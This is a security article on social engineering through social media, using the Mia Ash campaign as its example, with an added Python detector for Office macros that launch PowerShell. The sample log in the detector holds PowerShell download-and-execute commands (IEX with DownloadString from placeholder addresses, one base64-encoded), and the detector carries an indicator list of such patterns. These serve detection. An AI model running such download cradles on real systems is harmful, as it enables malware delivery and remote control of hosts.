People will often use the easiest method to achieve their goals, and this especially holds true for attackers.
More often than not, this means social engineering, since people are usually easier to bypass than technical controls. Social engineering has evolved from shoulder surfing and pretexting to using social media as an element of the attack, and as it has evolved it has become harder to detect and prevent, so enterprise defenses have had to coevolve with it.
This tip will explore how social engineering attacks and enterprise defenses for social engineering via social media have both evolved.
How social engineering has evolved
The skills needed for social engineering are different from, and potentially easier to develop than, those needed to find new zero-day vulnerabilities or new ways to bypass technical controls. Modern social engineering started out as part of phone phreaking and has always targeted people with access, whether privileged access such as root or administrator rights, or simply access to the systems the attacker wants.
Social engineering and its many variants, such as phishing, spear phishing, whaling, smishing and, now, social media, use the same basic techniques to get a target to take a requested action; the specific technology or medium matters less than the technique. Attacks via social networking exploit the target's trust in a persona that seems legitimate because a rich social network backs its claims.
SecureWorks published a blog post on a social engineering campaign it named Mia Ash, after the fake persona at its center, in which the attacker built rapport over social networks, sent the target a macro-laced Microsoft Office document as an attachment and persuaded the target to open it. Once the document was opened and the macro enabled, a PowerShell command ran to download the PupyRAT malware. PupyRAT gave the attacker remote control of the system with the privileges of the user who opened the document; complete control of the host required that user to be a local administrator.
The Mia Ash social networking attack used fake Facebook and LinkedIn profiles with legitimate-looking connections and pictures. This attack mirrors a traditional phishing attack that uses legitimate-looking emails with a malicious URL or attachment.
Enterprise defenses for social engineering attacks via social media
Defending against social engineering attacks demands layered protection, including careful monitoring of an enterprise's IT environment. It is not possible to prevent all social engineering attacks, so enterprise security teams should focus on monitoring, response and training.
Security awareness training has often included modules on social engineering and phishing, but there is ongoing debate about how effective that training is. Training and careful monitoring are both necessary, but monitoring can negatively impact the privacy of consumers and employees. It may not be possible to stop social engineering without significant privacy impacts, so customers and employees must be notified that the IT environment is being monitored.
Something else to consider when assessing the risk from social engineering is the complexity that stopping these attacks might require; that complexity can make systems more brittle and harder to manage, and the monitoring itself needs additional resources. Some enterprises may decide to ban social media in the workplace, but that will be about as effective as banning smartphones or any other popular technology.
Since a key aspect of the Mia Ash attack was getting the target to open an attachment, the same attachment could have been sent via email or served from a malicious website in a watering hole attack, so banning social media would not necessarily have prevented it. It may be more effective to provide security awareness training on safe social media usage and on incident response.
As part of incident response training, make sure people know how to report potential issues and to ask questions about anything that seems suspicious, such as someone asking them to open an attachment, provide sensitive information about the organization or visit an unfamiliar website. Training on social media could include recommendations to connect only with people you know in real life or have met in person, or with new contacts who share colleagues with you.
SecureWorks also recommends basic security controls, such as disabling macros in Microsoft Office and using endpoint security tools. Such tools can prevent malicious executables from running through application whitelisting, and can restrict PowerShell so that only approved scripts and commands execute.
Likewise, logging every process that runs on a system, including its parent process and command line, lets an enterprise detect the malicious command or executable even when prevention fails. However, these controls assume the end user is not running as a local administrator; an administrator can disable or bypass them.
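The detection the two preceding paragraphs describe, as an added example that is not code from this article or from SecureWorks: a small detector run over constructed Sysmon-style process-creation events (JSON, one per line). It flags an Office application spawning a script host, searches the command line for download-and-execute indicators, decodes a base64 -EncodedCommand payload so an encoded stager is not missed, and records whether the process ran elevated, which is the administrator caveat above. All host names, user names, paths and addresses are hypothetical.

```python
"""Detect the Office -> macro -> PowerShell download chain in process telemetry.

Added example (not the article's or SecureWorks' code). Input is constructed,
Sysmon-like process-creation events; field names follow Sysmon Event ID 1.
"""
import base64
import json
import re

# Office binaries that should not normally launch script hosts themselves.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Interpreters and living-off-the-land binaries a macro typically launches.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Lower-cased substrings typical of a macro's download-and-execute stage.
DOWNLOAD_INDICATORS = ["downloadstring", "downloadfile", "invoke-webrequest", "net.webclient",
                       "start-bitstransfer", "invoke-expression", "iex ", "http://", "https://",
                       "-encodedcommand", "-enc ", "-ec ", "bypass", "-w hidden",
                       "windowstyle hidden"]
# PowerShell accepts -e, -ec, -enc and -EncodedCommand, each followed by base64.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def basename(path):
    """File name of a Windows or POSIX path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script):
    """Build a -EncodedCommand argument (base64 of UTF-16LE), as a macro would.
    Used here only to construct the sample log line below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or '' if there is none."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # not valid base64 after all
        return ""


def analyze_event(event):
    """Return a finding for an Office -> script-host launch, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + " " + decoded).lower()  # search clear text and decoded stage
    indicators = [i for i in DOWNLOAD_INDICATORS if i in haystack]
    return {
        "record": event.get("RecordId"),
        "user": event.get("User", ""),
        "parent": parent,
        "child": child,
        "indicators": indicators,
        "decoded_command": decoded,
        # High/System integrity means the macro already ran with administrator
        # rights, so the attacker's foothold is privileged from the start.
        "elevated": event.get("IntegrityLevel", "").lower() in {"high", "system"},
        "severity": "high" if indicators else "medium",
    }


def scan(log_lines):
    """Run analyze_event over JSON lines and return the list of findings."""
    findings = []
    for line in log_lines:
        finding = analyze_event(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry: hypothetical users, paths and TEST-NET addresses.
ENCODED_STAGE = encode_command(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/s.ps1')")
OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    # Benign: the user opens a document from Explorer.
    json.dumps({"RecordId": 1, "User": "CORP\\jdoe", "IntegrityLevel": "Medium",
                "ParentImage": "C:\\Windows\\explorer.exe", "Image": OFFICE + "WINWORD.EXE",
                "CommandLine": "\"WINWORD.EXE\" /n \"C:\\Users\\jdoe\\Downloads\\survey.docm\""}),
    # The chain from the article: macro launches PowerShell to fetch the RAT.
    json.dumps({"RecordId": 2, "User": "CORP\\jdoe", "IntegrityLevel": "Medium",
                "ParentImage": OFFICE + "WINWORD.EXE", "Image": PS,
                "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -c "
                               "\"IEX (New-Object Net.WebClient).DownloadString("
                               "'http://203.0.113.10/update.ps1')\""}),
    # Same stage, base64-encoded, from a user who is a local administrator.
    json.dumps({"RecordId": 3, "User": "CORP\\admin-js", "IntegrityLevel": "High",
                "ParentImage": OFFICE + "EXCEL.EXE", "Image": PS,
                "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + ENCODED_STAGE}),
    # Benign: Word launching the print spooler helper.
    json.dumps({"RecordId": 4, "User": "CORP\\jdoe", "IntegrityLevel": "Medium",
                "ParentImage": OFFICE + "WINWORD.EXE", "Image": "C:\\Windows\\splwow64.exe",
                "CommandLine": "C:\\Windows\\splwow64.exe 12288"}),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] record {f['record']}: {f['parent']} -> {f['child']} as "
              f"{f['user']}{' (elevated)' if f['elevated'] else ''}; indicators={f['indicators']}")
        if f["decoded_command"]:
            print("    decoded:", f["decoded_command"])
```

The parent-child pairing is the durable signal: the indicator list is easy for an attacker to vary, but a macro that needs to fetch a second stage still has to launch something. Disabling macros removes the first step; the elevated flag tells the responder whether the standard-user assumption of the other controls held on that host.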
It's fun for those in security to imagine they are being attacked by super spies, and it makes great headlines, but sometimes attacks are simply more mundane social engineering schemes that are very difficult to stop with technical controls. Implementing the necessary technical controls is required in many cases, but protecting your environment also requires understanding how those controls fail and monitoring for failures and suspicious activity.